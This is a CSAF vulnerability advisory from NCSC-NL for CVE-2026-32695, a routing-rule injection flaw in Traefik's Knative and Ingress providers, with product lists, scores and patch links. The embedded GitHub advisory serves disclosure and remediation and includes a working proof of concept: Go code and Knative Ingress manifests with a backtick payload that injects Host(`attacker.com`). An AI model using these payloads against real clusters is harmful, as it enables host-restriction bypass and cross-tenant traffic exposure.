{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-32695", "tracking": { "current_release_date": "2026-04-03T17:25:40.713300Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-32695", "initial_release_date": "2026-03-27T19:43:51.725356Z", "revision_history": [ { "date": "2026-03-27T19:43:51.725356Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-27T19:43:54.936454Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-27T19:44:22.255530Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| Products connected (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-27T19:44:26.480086Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-27T20:28:37.001241Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)." }, { "date": "2026-03-27T20:28:40.025875Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-27T20:48:23.608695Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-28T12:28:40.532569Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| Product Identifiers created (1).| Product Remediations created (2).| References created (5).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-28T12:28:45.472473Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:41:18.967120Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-29T00:41:27.977451Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-30T12:38:44.473405Z", "number": "12", "summary": "Unknown change." }, { "date": "2026-04-03T17:25:29.769895Z", "number": "13", "summary": "CVSS created.| Products connected (2).| Product Identifiers created (2).| Exploits created (1)." }, { "date": "2026-04-03T17:25:38.813185Z", "number": "14", "summary": "NCSC Score updated." } ], "status": "interim", "version": "14" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441150", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_devspaces:3" } } } ], "category": "product_name", "name": "Red Hat OpenShift Dev Spaces" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2485335" } } ], "category": "product_name", "name": "traefik-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift Dev Spaces" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/3.7.0-ea1", "product": { "name": "vers:unknown/3.7.0-ea1", "product_id": "CSAFPID-5902893", "product_identification_helper": { "cpe": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/<3.6.11", "product": { "name": "vers:unknown/<3.6.11", "product_id": "CSAFPID-5942546", "product_identification_helper": { "cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2", "product": { "name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2", "product_id": "CSAFPID-5874590" } } ], "category": "product_name", "name": "Traefik" } ], "category": "vendor", "name": "Traefik" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-32695", "cwe": { "id": "CWE-917", "name": "Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')" }, "notes": [ { "category": "description", "text": "Traefik is an HTTP reverse proxy and load balancer. Prior to versions 3.6.11 and 3.7.0-ea.2, Traefik's Knative provider builds router rules by interpolating user-controlled values into backtick-delimited rule expressions without escaping. In live cluster validation, Knative `rules[].hosts[]` was exploitable for host restriction bypass (for example `tenant.example.com`) || Host(`attacker.com`), producing a router that serves attacker-controlled hosts. Knative `headers[].exact` also allows rule-syntax injection and proves unsafe rule construction. In multi-tenant clusters, this can route unauthorized traffic to victim services and lead to cross-tenant traffic exposure. Versions 3.6.11 and 3.7.0-ea.2 patch the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32695" }, { "category": "description", "text": "Traefik is an HTTP reverse proxy and load balancer. Prior to versions 3.6.11 and 3.7.0-ea.2, Traefik's Knative provider builds router rules by interpolating user-controlled values into backtick-delimited rule expressions without escaping. In live cluster validation, Knative `rules[].hosts[]` was exploitable for host restriction bypass (for example `tenant.example.com`) || Host(`attacker.com`), producing a router that serves attacker-controlled hosts. Knative `headers[].exact` also allows rule-syntax injection and proves unsafe rule construction. In multi-tenant clusters, this can route unauthorized traffic to victim services and lead to cross-tenant traffic exposure. Versions 3.6.11 and 3.7.0-ea.2 patch the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32695.json" }, { "category": "description", "text": "## Summary\n\nThere is a potential vulnerability in Traefik's Kubernetes Knative, Ingress, and Ingress-NGINX providers related to rule injection.\n\nUser-controlled values are interpolated into backtick-delimited Traefik router rule expressions without escaping or validation. A malicious value containing a backtick can terminate the literal and inject additional operators into Traefik's rule language, altering the parsed rule tree. In shared or multi-tenant deployments, this can bypass host and header routing constraints and redirect unauthorized traffic to victim services.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n
\nOriginal Description\n\n### Summary\nTraefik's Knative provider builds router rules by interpolating user-controlled values into backtick-delimited rule expressions without escaping. In live cluster validation, Knative `rules[].hosts[]` was exploitable for host restriction bypass (for example `tenant.example.com`) || Host(`attacker.com`), producing a router that serves attacker-controlled hosts. Knative `headers[].exact` also allows rule-syntax injection and proves unsafe rule construction. In multi-tenant clusters, this can route unauthorized traffic to victim services and lead to cross-tenant traffic exposure. Severity is High in shared deployments.\n\nTested on Traefik `v3.6.10`; the vulnerable pattern appears to have been present since the Knative provider was introduced. Earlier versions with Knative provider support are expected to be affected.\n\n### Details\nThe issue is caused by unsafe rule-string construction using `fmt.Sprintf` with backtick-delimited literals.\n\nIncriminated code patterns:\n\n- `pkg/provider/kubernetes/knative/kubernetes.go`\n - `fmt.Sprintf(\"Host(`%v`)\", host)`\n - `fmt.Sprintf(\"Header(`%s`,`%s`)\", key, headers[key].Exact)`\n - `fmt.Sprintf(\"PathPrefix(`%s`)\", path)`\n\n- `pkg/provider/kubernetes/ingress/kubernetes.go`\n - `fmt.Sprintf(\"Host(`%s`)\", host)`\n - `fmt.Sprintf(\"(Path(`%[1]s`) || PathPrefix(`%[1]s/`))\", path)`\n\n- `pkg/provider/kubernetes/ingress-nginx/kubernetes.go` (hardening candidate; not the primary confirmed vector in this report)\n - `fmt.Sprintf(\"Header(`%s`, `%s`)\", c.Header, c.HeaderValue)`\n - related host/path/header concatenations with backticks\n\nBecause inputs are inserted directly into rule expressions, a malicious value containing a backtick can terminate the literal and inject additional operators/tokens in Traefik's rule language. Example payload:\n\n- `x`) || Host(`attacker.com`\n\nWhen used as a header value in Knative rule construction, the resulting rule contains:\n\n- `Header(`X-Poc`,`x`) || Host(`attacker.com`)`\n\nThis alters rule semantics and enables injection into Traefik's rule language. Depending on the field used (`hosts[]` vs `headers[].exact`) this can become a direct routing bypass.\n\nImportant scope note:\n\n- Gateway API code path (`pkg/provider/kubernetes/gateway/httproute.go`) already uses safer `%q` formatting for header/query rules and is not affected by this exact pattern.\n- For standard Kubernetes Ingress, `spec.rules.host` is validated as DNS-1123 by the API server, which rejects backticks (so this specific host-injection payload is typically blocked).\n- For Knative Ingress, `rules[].hosts[]` and `headers[].exact` are typed as `string` in CRD schema with no pattern constraint.\n- In this validation environment, `rules[].hosts[]` was accepted and produced a practical host bypass. `headers[].exact` was also accepted and produced rule-syntax injection in generated routers.\n- Ingress-NGINX patterns are included as follow-up hardening targets and are not claimed as independently exploitable here.\n- Exploitability depends on admission/validation policy and who can create these resources.\n\n### PoC\n\n1. Local deterministic PoC (no cluster required):\n\n- Run:\n - Save the inline PoC below as `poc_build_rule.go`\n - Run `go run poc_build_rule.go`\n- Observe output:\n - Legitimate rule: `(Host(`tenant.example.com`)) && (Header(`X-API-Key`,`secret123`)) && PathPrefix(`/`)`\n - Malicious rule: `(Host(`tenant.example.com`)) && (Header(`X-API-Key`,`x`) || Host(`attacker.com`)) && PathPrefix(`/`)`\n- This proves syntax injection in current string-construction logic.\n\nInline PoC code (self-contained):\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"sort\"\n\t\"strings\"\n)\n\nfunc buildRuleKnative(hosts []string, headers map[string]struct{ Exact string }, path string) string {\n\tvar operands []string\n\n\tif len(hosts) > 0 {\n\t\tvar hostRules []string\n\t\tfor _, host := range hosts {\n\t\t\thostRules = append(hostRules, fmt.Sprintf(\"Host(`%v`)\", host))\n\t\t}\n\t\toperands = append(operands, fmt.Sprintf(\"(%s)\", strings.Join(hostRules, \" || \")))\n\t}\n\n\tif len(headers) > 0 {\n\t\theaderKeys := make([]string, 0, len(headers))\n\t\tfor k := range headers {\n\t\t\theaderKeys = append(headerKeys, k)\n\t\t}\n\t\tsort.Strings(headerKeys)\n\n\t\tvar headerRules []string\n\t\tfor _, key := range headerKeys {\n\t\t\theaderRules = append(headerRules, fmt.Sprintf(\"Header(`%s`,`%s`)\", key, headers[key].Exact))\n\t\t}\n\t\toperands = append(operands, fmt.Sprintf(\"(%s)\", strings.Join(headerRules, \" && \")))\n\t}\n\n\tif len(path) > 0 {\n\t\toperands = append(operands, fmt.Sprintf(\"PathPrefix(`%s`)\", path))\n\t}\n\n\treturn strings.Join(operands, \" && \")\n}\n\nfunc main() {\n\tlegitHeaders := map[string]struct{ Exact string }{\n\t\t\"X-API-Key\": {Exact: \"secret123\"},\n\t}\n\tfmt.Println(buildRuleKnative([]string{\"tenant.example.com\"}, legitHeaders, \"/\"))\n\n\tmaliciousHeaders := map[string]struct{ Exact string }{\n\t\t\"X-API-Key\": {Exact: \"x`) || Host(`attacker.com\"},\n\t}\n\tfmt.Println(buildRuleKnative([]string{\"tenant.example.com\"}, maliciousHeaders, \"/\"))\n\n\t// Safe variant example (Gateway-style):\n\tfmt.Println(fmt.Sprintf(\"Header(%q,%q)\", \"X-API-Key\", \"x`) || Host(`attacker.com\"))\n}\n```\n\n2. Cluster PoC (Knative host injection, primary / practical bypass):\n\n- Preconditions:\n - Kubernetes test cluster with Knative Serving.\n - Traefik configured with Knative provider.\n- Apply manifest:\n - `kubectl apply -f - <<'YAML'`\n```yaml\napiVersion: networking.internal.knative.dev/v1alpha1\nkind: Ingress\nmetadata:\n name: poc-host-injection\n namespace: default\n annotations:\n # This exact key worked in live validation:\n networking.knative.dev/ingress.class: \"traefik.ingress.networking.knative.dev\"\nspec:\n rules:\n - hosts:\n - 'tenant.example.com`) || Host(`attacker.com'\n visibility: External\n http:\n paths:\n - path: \"/\"\n splits:\n - percent: 100\n serviceName: dummy\n serviceNamespace: default\n servicePort: 80\nYAML\n```\n - (If API version mismatch, adjust between `networking.internal.knative.dev/v1alpha1` and `networking.knative.dev/v1alpha1`.)\n- Verify:\n - Check Traefik router rule contains: `(Host(`tenant.example.com`) || Host(`attacker.com`)) && PathPrefix(`/`)`.\n - Request with `Host: attacker.com` returns backend 200.\n - This demonstrates host restriction bypass in practice.\n\n3. Cluster PoC (Knative header injection, confirms rule-syntax injection):\n\n- Apply:\n - `kubectl apply -f - <<'YAML'`\n```yaml\napiVersion: networking.internal.knative.dev/v1alpha1\nkind: Ingress\nmetadata:\n name: poc-rule-injection\n namespace: default\n annotations:\n networking.knative.dev/ingress.class: \"traefik.ingress.networking.knative.dev\"\nspec:\n rules:\n - hosts:\n - \"tenant.example.com\"\n visibility: External\n http:\n paths:\n - path: \"/\"\n headers:\n X-Poc:\n exact: 'x`) || Host(`attacker.com'\n splits:\n - percent: 100\n serviceName: dummy\n serviceNamespace: default\n servicePort: 80\nYAML\n```\n- Verify:\n - Inspect generated Traefik dynamic router rule (API/dashboard/logs).\n - Confirm injected fragment `|| Host(`attacker.com`)` is present.\n - Send request with `Host: attacker.com` and no expected tenant header (expected: 404 for this payload shape, because leading `Host(tenant)` still applies).\n - Send request with `Host: tenant.example.com` and `X-Poc: x` (expected: 200 from backend).\n\n4. Optional Ingress PoC (scope check):\n\n- Apply:\n - `kubectl apply -f - <<'YAML'`\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: poc-ingress-host-injection\n namespace: default\n annotations:\n kubernetes.io/ingress.class: traefik\nspec:\n rules:\n - host: 'tenant.example.com`) || Host(`attacker.com'\n http:\n paths:\n - path: /\n pathType: Prefix\n backend:\n service:\n name: dummy\n port:\n number: 80\nYAML\n```\n- Expected in most clusters: API server rejects this payload because Ingress `host` must satisfy DNS-1123.\n- Keep this step only as a negative control to demonstrate the distinction between native Ingress validation and Knative CRD behavior.\n\nValidation executed in this report:\n\n- Local deterministic PoC executed with `go run` and output matched expected injected rule.\n- Live cluster test executed on local `kind` cluster (`kind-traefik-poc`) with Traefik `v3.6.10` and Knative Serving CRDs.\n- Annotation key confirmed in this environment: `networking.knative.dev/ingress.class` (dot). The hyphen variant was not used by the successful processing path.\n- Traefik API/logs confirmed generated routers included injected expressions.\n- Live HTTP request with `Host: attacker.com` reached backend (`200`) for Knative host-injection payload.\n\n### Impact\n- **Vulnerability type:** Rule injection / authorization bypass at routing layer.\n- **Primary impact:** Bypass of intended routing predicates (host/header/path), enabling unauthorized routing to protected services.\n- **Who is impacted:** Primarily deployments using Traefik Knative provider where untrusted or semi-trusted actors can create/update Knative Ingress resources (typical in multi-tenant clusters, shared namespaces, or weak admission controls). Standard Kubernetes Ingress host injection is usually blocked by API validation.\n- **Security consequences:** Cross-tenant traffic access, internal service exposure, policy bypass, and potential chaining with app-level vulnerabilities.\n\n
", "title": "github - https://api.github.com/advisories/GHSA-67jx-r9pv-98rj" }, { "category": "description", "text": "A flaw was found in Traefik, an HTTP reverse proxy and load balancer. When using the Knative provider, Traefik incorrectly interpolates user-controlled values into router rule expressions without proper escaping. This vulnerability allows an attacker to inject malicious rule syntax, leading to a host restriction bypass. In multi-tenant environments, this can result in unauthorized traffic being routed to victim services, potentially exposing cross-tenant traffic.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32695.json" }, { "category": "other", "text": "0.00015", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "title": "CVSSV4" }, { "category": "other", "text": "6.3", "title": "CVSSV4 base score" }, { "category": "other", "text": "4.1", "title": "NCSC Score" }, { "category": "other", "text": "There is product data available from source Redhat", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5874590", "CSAFPID-5942546", "CSAFPID-1441150", "CSAFPID-2485335", "CSAFPID-5902893" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32695" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32695.json" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-67jx-r9pv-98rj" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32695.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/traefik/traefik/security/advisories/GHSA-67jx-r9pv-98rj" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32695" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/traefik/traefik/commit/11d251415a6fd935025df5a9dda898e17e3097b2" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-67jx-r9pv-98rj" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-32695" } ], "remediations": [ { "category": "mitigation", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "CSAFPID-1441150", "CSAFPID-2485335" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1441150", "CSAFPID-2485335", "CSAFPID-5874590", "CSAFPID-5902893", "CSAFPID-5942546" ] } ], "title": "CVE-2026-32695" } ] }